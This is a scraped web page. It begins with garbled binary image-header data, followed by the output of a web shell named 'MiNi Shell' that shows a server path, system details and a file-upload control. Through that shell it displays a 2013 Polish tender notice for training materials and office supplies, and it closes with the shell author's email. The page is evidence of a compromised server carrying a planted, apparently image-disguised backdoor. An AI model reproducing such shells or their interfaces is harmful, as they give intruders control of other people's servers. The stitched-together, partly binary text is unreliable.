JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131002/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131002/202543-N-2013.html

<p class="kh_header"><b>Milicz: Wykonanie i dostarczenie materiałów  szkoleniowych oraz dostarczenie materiałów biurowych na potrzeby realizacji projektu Poprawa jakości doskonalenia nauczycieli w Powiecie Milickim</b><br>
<b>Numer ogłoszenia: 202543 - 2013; data zamieszczenia: 02.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Edukacyjne i Psychologiczno-Pedagogiczne , ul. Trzebnicka 4B, 56-300 Milicz, woj. dolnośląskie, tel. 71 38 40 237, faks 71 38 40 238.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pceipp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie i dostarczenie materiałów  szkoleniowych oraz dostarczenie materiałów biurowych na potrzeby realizacji projektu Poprawa jakości doskonalenia nauczycieli w Powiecie Milickim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie i dostarczenie materiałów  szkoleniowych oraz dostarczenie materiałów biurowych na potrzeby realizacji projektu Poprawa jakości doskonalenia nauczycieli w powiecie milickim. Projekt realizowany w ramach POKL, Priorytet III Wysoka jakość systemu oświaty. Działanie 3.5 Kompleksowe wspomaganie rozwoju szkół. 
2.	Szczegółowy zakres przedmiotu zamówienia obejmuje:
a)	Wykonanie i dostarczenie materiałów szkoleniowych

lp	Materiały szkoleniowe z trwale umieszczonym logo projektowym.	ilość sztuk
1	Teczka z rączką Format A4, szerokość grzbietu 40mm. Wykonana z twardej tektury o grubości 2mm pokrytej folią, Solidna rączka w kolorze czarnym ułatwia przenoszenie dokumentów w teczce, zamykana na zatrzask lub w inny solidny sposób, kolor niebieska (ciemna)	1090
2	Długopis metalowy, np. cosmo z grawerem projektowym	1190
3	Pamięć przenośna USB, 4GB, z grawerem projektowym	1190

b)	Wykonanie i dostarczenie materiałów biurowych i eksploatacyjnych

lp	Materiały biurowe i eksploatacyjne	Ilość sztuk 
1	Toner czarny o wydajności minimum 14600 stron przy pokryciu 5%, dedykowany do drukarki Canon A3 2520IR 	55
2	Toner do drukarki kolorowej o wydajności minimum 1500 str. A4, dedykowany do drukarki Canon MF8280Cw, 	30
3	papier biały do drukarki i kserokopiarki, format A4, 80 g/m2, ryza posiada 500 arkuszy (ryza)	
1500 
4	papier format A3, 80 g/m2, 500 arkuszy w ryzie (ryza)	20 
5	skoroszyt A4 miękki, zaokrąglone rogi, metalowe wąsy, z dziurkami umożliwiającymi wpięcie do segregatora, wymienny dwustronny pasek opisowy, pojemność ok. 200 kartek, kolor czarny 300 szt., zielony 400 szt., szary 200 szt., granatowy 200 szt. żółty 100 szt., pomarańczowy 100 szt.  	1300
6	koszulki do segregatorów, wykonane z miękkiej groszkowej folii polipropylenowej, posiadają wzmocniony pasek z naciętą perforacją dzięki czemu pasują do każdego rodzaju segregatora pakowane po 100 szt. grubość foli 40mic.	52 op.
7	segregator z mechanizmem dźwigowym do dokumentów o rozmiarze A4/75mm, wykonany z tektury pokrytej ekologiczna folią o strukturze płótna, dwustronny wymienna etykieta na grzbiecie o wymiarach 48x153 mm, wzmocniony otwór na palec	108
8	segregator z mechanizmem dźwigowym do dokumentów o rozmiarze A4/50mm, wykonany z tektury pokrytej ekologiczna folią o strukturze płótna, dwustronny wymienna etykieta na grzbiecie o wymiarach 28x153 mm, wzmocniony otwór na palec, kolor ciemna zieleń, ilość razem 20 szt. 	20
9	Koperta C5  biała	100
10	Koperta C6 biała samoprzylepna z paskiem hk	100
11	koperta B4 samoprzylepna z paskiem HK biała 	100
12	koperta z rozszerzonymi bokami i spodem brązowa format A4	100
13	karteczki samoprzylepne każdy notes/bloczek posiada 100 szt. kartek, kolor żółty, 38x51 mm 	64
14	grzbiety plastikowe do bindownic w kolorze czarnym 10 mm, 	1030 
15	grzbiety plastikowe do bindownic w kolorze czarnym 14 mm, 	500
16	grzbiety plastikowe do bindownic w kolorze czarnym 6 mm, 	500
17	płyta CD do jednokrotnego zapisu, wykorzystywana do archiwizacji danych, pojemność płyty 700 MB. Kompatybilna z najnowszymi wersjami nagrywarek i odtwarzaczy płyt CD i DVD	200
18	płyta CD-R/W 700 wielokrotnego nagrywania w opakowaniu plastikowym,	20
19	kalkulator - z 10 pozycyjnym wyświetlaczem, klawisz cofania, klawisz zmiany znaków, podwójne zasilanie, Duży wyświetlacz, plastikowe klawisze	2
20	kostka biurowa do notowania biała klejona o wymiarach ok. 85x85x40	64
21	zakładki indeksujące umożliwiające łatwe zaznaczanie i szybkie odnajdywanie ważnych informacji. Do wielokrotnego odrywania i przyklejania. Rozmiar 50x12 mm, różne kolory, opakowanie zawiera minimum 4 bloczki	48 op.
22	koperta na Cd 	200
23	koszulki na CD/DVD z uniwersalną perforacją umożliwiające przechowywanie płyt w segregatorze lub skoroszycie, w zestawie etykiety i fiszki, pojemność koszulki 4 CD/DVD. Opakowanie zawiera 10 szt. 	3 op.
24	przekładki kartonowe kolorowe wąskie, wykonane z grubego kolorowego kartonu o gramaturze 190 g/m2 wymiary 235x105 mm, opakowanie zawiera 100 szt. 	36 op.
25	pudło na teczki zawieszane, Pudło na teczki zawieszane w formacie A4 do archiwizacji i przenoszenia dokumentów. Laminowana powierzchnia i metalowe okucia na rogach. Minimalna wielkość 350x410x260, 	2
26	teczki zwieszane z wąsami do powyższego pudła, posiadające zakładkę indeksową umożliwiającą opis zawartości uchwyt zawieszkowy wykonany z metalu gwarantującego dłuższe użytkowanie produktu gramatura 230g/m2 szt. 30 (mix kolorów	30
27	listwy wsuwane do formatu A4 - szerokość grzbietu 4 mm 	50
28	listwy wsuwane do formatu A4 - szerokość grzbietu 6 mm 	50
29	listwy wsuwane do formatu A4 - szerokość grzbietu 9 mm 	50
30	listwy wsuwane do formatu A4 - szerokość grzbietu 15 mm 	50
31	szuflada na dokumenty wykonana z trwałego poliestru, z przodu miejsce na naklejenie etykiet, przód profilowany zabezpieczający wypadanie dokumenty możliwość łączenia w pionie i kaskadowo kolor dymny/czarny 	16
32	pudło archiwizacyjne do segregatorów na min. 6 segregatorów	10
33	dziurkacz 2 dziurki, obejmujący minimum 40 kartek	1
34	dziurkacz 2 dziurki, 	6
35	zszywacz na minimum 130 kartek	1
36	Zszywacz metalowy z plastikowymi wykończeniami, umożliwia zszywanie zamknięte i otwarte na długości 75 mm, wykorzystuje zszywki 24/6 i 26/6 mieści w magazynku ok. 150 zszywek.	6
37	rozszywacz 5 szt. z metalową konstrukcją i plastikową trwałą obudową	6
38	zszywki 23/6 pakowane po 1000 szt. 	3 op.
39	zszywki 23/8 pakowane po 1000 szt.	3 op.
40	zszywki 23/15 pakowane po 1000 szt.	3 op.
41	zszywki 24/6, opakowanie mieści 1000 szt.	72 op.
42	zszywki 26/6 opakowanie mieści 1000 szt.	12 op.
43	spinacze okrągłe 70 mm Opakowanie mieści 50 szt.	26 op.
44	spinacze okrągłe 33mm opakowanie mieści 100 szt.	39 op.
45	spinacze okrągłe 50 mm opakowanie mieści 100 szt	26 op. 
46	spinacze w pudełku magnetycznym ilość spinaczy w opakowaniu 125.	1
47	klipsy biurowe metalowe umożliwiające spięcie grubszych plików, pakowane po 12 sztuk, rozmiar. 41 mm	13 op.
48	klipsy biurowe metalowe umożliwiające spięcie grubszych plików, pakowane po 12 sztuk, rozmiar. 25 mm	13 op. 
49	pinezki zwykłe srebrne pakowane po 100 sztuk	10 op.
50	papier kostki samoprzylepne zawierające 400 kartek, kolor pastelowy żółty	12
51	przybornik na biurko, wykonany z tworzywa odpornego na pęknięcia, posiadający przegrody na artykuły piszące, przegrodę na drobne artykuły, kolor czarny	3
52	klej w sztyfcie 35 gram,	13
53	taśma klejąca 18 mm x 30yd,	13
54	nożyczki ostrza ze stali nierdzewnej, miękkie wewnętrzne uchwyty, długość 18 cm	7
55	linijka 30 cm,	5
56	długopis typ kenta lub równoważny innego producenta, kolor pisania niebieski, metalowa obudowa w kolorze czarnym, 	12
57	wkłady do długopisu typ kenta lub równoważny innego producenta, kolor pisania niebieski	24
58	długopis żelowy, obudowa plastikowa z gumowym uchwytem oraz metalową końcówką, kolor pisania niebieski	26
59	wkład do powyższego długopisu kolor niebieski	26
60	długopis żelowy, obudowa plastikowa z gumowym uchwytem oraz metalową końcówką, kolor pisania czerwony	26
61	wkład do powyższego długopisu kolor czerwony	26
62	długopis żelowy, obudowa plastikowa z gumowym uchwytem oraz metalową końcówką, kolor pisania zielony	26
63	wkład do powyższego długopisu kolor zielony	26
64	cienkopis do pisania, podkreślania, mocna plastikowa obudowa, mocna oprawiona w metal końcówka odporna na złamania i rozwarstwienia gwarantując wysoki komfort pisania aż do całkowitego wyczerpania tuszu kolor pisania zielony	39
65	cienkopis do pisania, podkreślania, mocna plastikowa obudowa, mocna oprawiona w metal końcówka odporna na złamania i rozwarstwienia gwarantując wysoki komfort pisania aż do całkowitego wyczerpania tuszu kolor pisania czerwony	39
66	cienkopis do pisania, podkreślania, mocna plastikowa obudowa, mocna oprawiona w metal końcówka odporna na złamania i rozwarstwienia gwarantując wysoki komfort pisania aż do całkowitego wyczerpania tuszu kolor pisania niebieski	39
67	zakreślacz fluorescencyjny żółty	24
68	zakreślacz fluorescencyjny zielony	24
69	zakreślacz fluorescencyjny pomarańczowy	24
70	zakreślacz fluorescencyjny niebieski	24
71	zakreślacz fluorescencyjny różowy	24
72	foliopisak z niezmywalnym tuszem do pisania po foliach, płytach CD/DVD kolor pisania czarny	6
73	Foliopisak kolor czerwony	6
74	Marker/mazak do tablicy Flipchart końcówka okrągła kolor czarny	208
75	Marker/mazak do tablicy Flipchart końcówka okrągła kolor czerwony	208
76	Marker/mazak do tablicy Flipchart końcówka okrągła kolor zielony	208
77	Marker/mazak do tablicy Flipchart końcówka okrągła kolor niebieski	208
78	ołówek bez gumki	32
79	gumka do mazania	13
80	temperówka aluminiowa	13
81	korektor w długopisie z metalową końcówką	13
82	korektor w taśmie minimalna długość taśmy 8 m. szerokość taśmy 5mm,	13
83	blok notatnikowy/makulaturowy w kratkę, klejony z góry format A4 minim. 96 stron,	13
84	deska z klipem format A4, kolor niebieski, sztywna podkładka do pisania ze sprężystym mechanizmem zaciskowym	5
85	druki polecenia wyjazdu służbowego A5 (ofset) typ 505-3 minimalna ilość kartek 40,	5
86	dziennik korespondencyjny w twardej oprawie, 192 kartki, format A4	1
87	karton wizytówkowy A4 kolor biały 250g/m2, papier gładki opakowanie minimum 20 arkuszy.	5 op.
88	karton wizytówkowy A4 kolor satyna/kremowy 230g/m2, papier tłoczony, faktura kryształ opakowanie minimum 20 arkuszy.	5 op.
89	karton wizytówkowy A4 kolor ecru 230g/m2, papier tłoczony, faktura płótno, opakowanie minimum 20 arkuszy.	5 op.
90	koło zeszyt w kratkę z lakierowaną okładką grubość minimum 96 kartek	5
91	okładki kartonowe skóropodobne format A4 do bindowania 250g/m2, kolor granatowy,	200
92	okładki kartonowe przezroczyste format A4 do bindowania 	200
93	papier kolorowy do drukarki i kserokopiarki, format A4, mix kolorów, gramatura 80g/m2, w opakowaniu 100 arkuszy.	80 op.
94	zeszyt A4 w kratkę twarda oprawa minimum 96 kartek 	13
95	zeszyt A5 w kratkę miękka oprawa minimum 96 kartek	13
96	tusz do stempli polimerowych i kauczukowych kolor niebieski poj. Ok. 30 ml. Ilość 2 szt. kolor 1 czerwony, 1 niebieski	2
97	tablica korkowa minimalne wymiary 60x80 cm,	4
98	skoroszyt oczkowy połówka, oczkowy (wyposażony w metalowe oczka umożliwiające wpięcie do segregatora, dostępne  z okładką wierzchnią wykonaną z połowy formatu A4	50
99	taśma dwustronna o uniwersalnym zastosowaniu wymiary.	2
100	taśma dwustronna piankowa szt.	1
101	taśma klejąca pakowa	1
102	teczka skrzydłowa A4 wykonana z twardej sztywnej tektury o gr. 2mm powlekana folią PP, z rączką, gładka o kolorze niebieskim 8szt, o kolorze zielonym 8 szt, o kolorze czarnym 10 szt. zamykana na zatrzask lub w inny solidny sposób. Szerokość grzbietu minimum 80 mm	30
103	teczka biała papierowa zamykana na gumkę, wykonana z tektury o zwiększonej gramaturze i sztywności	195
104	bindownica, jednorazowo dziurkuje minimum 8 arkuszy	1
105	niszczarka	1
106	tablica flipchart sztuk 4. Tablica o regulowanym kącie pochylenia z półką na przybory, powierzchnia sucho ścieralna - magnetyczna, lakierowana, uniwersalny uchwyt do bloku w formacie A1, stabilna konstrukcja nośna z aluminium, regulowana wysokość tablicy do 186 cm, regulowana trójnożna podstawa, rozkładane i chowane boczne ramiona, wymiary tablicy 70x100cm	4
107	zestaw akcesoriów niezbędnych do codziennej pracy i prawidłowej eksploatacji tablic sucho ścieralnych o właściwościach magnetycznych. W skład zestawu wchodzi: kolorowe magnezy minimum 10 szt., 2 płyny czyszczące w butelce z atomizerem o pojemności min. 50 ml. 1 Wycierak magnetyczny wraz z wymiennymi filcami ilość filców 10 szt.	4
108	Blok do flipchartów,  gładki wymiary 65x100 cm, minimum 50 kartek	160
109	Blok do flipchartów,  kratka wymiary 65x100 cm, minimum 20	80
110	masa mocująca nadająca się do wielokrotnego użytku, do stosowania w szkole, pracy i w projektach kreatywnych, w formie łatwych do odklejenia kawałków,  służy do tymczasowego przytwierdzania informacji, plakatów, planów itp.	16 op.
111	Aktówka/teczka zamykana zamkiem z rączką i boczną kieszenią zamykaną klapą,  cztery przegrody głębokie na dokumenty formatu A4, miejsce na  długopisy, wizytówki i telefon komórkowy, kolor czarny, wykonana z solidnego tworzywa	4
112	papier samoprzylepny format A4, opakowanie 100 arkuszy.	6 op.

3.	Zamawiający informuje, że dopuszcza składanie ofert na materiały jakościowo równoważne, spełniające równoważne parametry. 
Dotyczy tonerów: 
1)	Pod pojęciem fabrycznie nowe zamawiający rozumie produkty wykonane z  nowych elementów lub pełnowartościowych komponentów z odzysku, bez śladów uszkodzenia, w oryginalnych opakowaniach producenta z widocznym logo, symbolem produktu i terminem przydatności do użytku, posiadające wszelkie zabezpieczenia szczelności zbiorników z tonerem. 
2)	Przez produkt równoważny zamawiający rozumie produkt kompatybilny ze sprzętem, do którego jest zamówiony, o parametrach takich samych bądź lepszych (pojemność tonera, wydajność i jakość wydruku) w stosunku do oryginału produkowanego przez producenta urządzenia.
3)	W ramach realizacji zamówienia wykonawca zobowiązuje się do odbioru, utylizacji pojemników po zużytych materiałach eksploatacyjnych przekazanych przez zamawiającego, potwierdzając odbiór  takich pojemników.
4)	Wykonawca gwarantuje, że dostarczone tonery będą wysokiej jakości, zapewniają należyte bezpieczeństwo oraz posiadają właściwe opakowanie i oznakowanie. 
5)	Wykonawca gwarantuje, że zamontowanie i używanie dostarczonych przez niego tonerów nie spowoduje utratę praw gwarancji producenta urządzenia, do którego są przeznaczone. 
6)	Jeżeli w trakcie umowy zamawiający stwierdzi, że jakość, wydajność lub niezawodność dostarczonych produktów niekorzystnie odbiega od wymagań producenta urządzenia, wykonawca zobowiązuje się do gwarancyjnej wymiany produktu na nowy, wolny od wad w terminie 48 godzin ( w dni robocze) od momentu zgłoszenia przez zamawiającego  o wadliwym produkcie (mailowo lub faksem). Wymiana nastąpi w siedzibie zamawiającego, na koszt i ryzyko wykonawcy.
7)	Wykonawca zobowiązuje się do pokrycie kosztów naprawy urządzenia, gdy jej uszkodzenie powstało w wyniku stosowania tonera dostarczonego przez wykonawcę. Za podstawę żądania przez zamawiającego naprawy urządzenia (włączając w to wymianę bębna, lub głowicy) uważa się pisemną opinię autoryzowanego serwisu producenta urządzenia. Naprawa urządzenia wykonana zostanie w autoryzowanym serwisie producenta urządzenia, w terminie 3 dni od momentu zgłoszenia (faksem) wykonawcy przez zamawiającego konieczności naprawy. Koszty związane z naprawą ponosi wykonawca.
8)	Dostarczone tonery muszą posiadać  na opakowaniach zewnętrznych logo producenta, nazwę (typ, symbol) materiału, numer katalogowy, opis zawartości, termin przydatności do użycia.
9)	Wymaga się, aby oferowane tonery posiadały gwarancję na minimum 12 miesięcy od dnia dostawy.
4.	Podane w ust. 2 wartości są wielkościami szacunkowymi, przyjętymi dla porównania ofert i wyboru najkorzystniejszej oferty. Nie stanowią zobowiązania Zamawiającego do zamówienia podanych ilości.
5.	Zamawiający zastrzega w umowie z Wykonawcą prawo wglądu do dokumentów Wykonawcy związanych z realizowanym Projektem, w tym dokumentów finansowych..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>ZAMAWIAJĄCY PRZEWIDUJE UDZIELENIE ZAMÓWIEŃ UZUPEŁNIAJĄCYCH w wysokości maksymalnej określonej w art. 67 ust. 1 pkt. 7 ustawy PZP.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.12.50.00-1, 30.19.00.00-7, 30.12.51.10-5, 30.12.51.00-2, 30.19.21.13-6, 30.19.23.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.07.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że w ciągu 3 ostatnich lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie, wykonał lub wykonuje co najmniej dwa zamówienia na dostawy artykułów biurowych (w tym tonerów) o wartości nie mniejszej niż 20 000 zł (słownie złotych: dwadzieścia tysięcy) każde wraz z dokumentem potwierdzającym wykonanie takiego zamówienia/listem referencyjnym</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie powyższego warunku, zamawiający uzna pisemne oświadczenie Wykonawcy w tym zakresie (załącznik nr 3 do SIWZ),</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie powyższego warunku, zamawiający uzna pisemne oświadczenie Wykonawcy w tym zakresie (załącznik nr 3 do SIWZ),</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie powyższego warunku, zamawiający uzna pisemne oświadczenie Wykonawcy w tym zakresie (załącznik nr 3 do SIWZ),</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pceipp.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.pceipp.pl, www.bip.milicz-powiat.pl oraz w siedzibie zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.10.2013 godzina 09:30, miejsce: Ofertę należy złożyć w zamkniętej kopercie w Powiatowym Centrum Edukacyjnym i Psychologiczno Pedagogicznym ul. Trzebnicka 4b 56-300 Milicz.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską ze środków Narodowej Strategii Spójności w ramach Programu Operacyjnego Kapitał Ludzki dla Województwa Dolnośląskiego na lata.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com